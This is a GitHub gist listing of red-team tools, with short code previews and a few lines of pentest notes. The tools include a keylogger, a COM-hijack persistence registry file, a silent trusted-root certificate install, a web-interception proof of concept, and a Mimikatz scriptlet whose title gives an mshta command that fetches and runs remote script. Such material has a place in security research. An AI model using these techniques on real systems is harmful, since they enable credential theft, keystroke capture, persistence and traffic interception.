- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
p4nd0rum
/ gist:04fb7fee4330758b0ba7e0a748b6217b
Created
May 19, 2018 22:22
WMIKatz - Are you afraid
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0"> | |
| <!-- Copyright (c) Microsoft Corporation. All rights reserved. --> | |
| <xsl:output method="text" omit-xml-declaration="yes" indent="no"/> | |
| <xsl:strip-space elements="*" /> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
p4nd0rum
/ InstallUtilMouseKeyLogger.cs
Created
March 19, 2018 00:18
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
p4nd0rum
/ wlrmdr.ps1
Created
March 5, 2018 14:40
— forked from michael-bey/wlrmdr.ps1
Windows Logon Reminder Balloon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Wlrmdr { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory = $True, Position = 0)] | |
| [String] $Message = "You are using pirated Windows", | |
| [Parameter(Mandatory = $True, Position = 1)] | |
| [String] $IconType = 'Key', | |
| [Parameter(Mandatory = $True, Position = 2)] | |
| [String] $Title = 'Windows Explorer' |
p4nd0rum
/ winlogon.reg
Created
March 5, 2018 11:32
— forked from anonymous/winlogon.reg
WinLogon Windows 7 x64 COM Hijack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
p4nd0rum
/ powerslim.py
Created
March 5, 2018 10:25
— forked from velaskec/powerslim.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################################################################################################# | |
| # PowerSlim 0.1 | |
| ############################################################################################################# | |
| import os,re | |
| import clr,os | |
| clr.AddReference("System.Management") | |
| clr.AddReference("System.Management.Automation") | |
| from System.Management.Automation import * | |
| from System.Management.Automation.Host import * | |
| from System.Management.Automation.Runspaces import * |
p4nd0rum
/ script.ps1
Created
March 1, 2018 17:02
Hooking MessageBox For No-Prompt Trusted Root Certificate Install
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Verify Not Present | |
| ( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" }) | |
| #Import-Certificate | |
| ( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root | |
| #Prompted | |
| Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99 | |
p4nd0rum
/ InterceptorThing.ps1
Created
March 1, 2018 16:56
Interceptor - Normal User No Admin Required.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| This script demonstrates the ability to capture and tamper with Web sessions. | |
| For secure sessions, this is done by dynamically writing certificates to match the requested domain. | |
| This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack. | |
| Function: Interceptor | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
p4nd0rum
/ mimikatz.sct
Created
March 1, 2018 13:58
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
p4nd0rum
/ how-to-oscp-final.md
Created
October 16, 2017 15:15
— forked from unfo/how-to-oscp-final.md
NewerOlder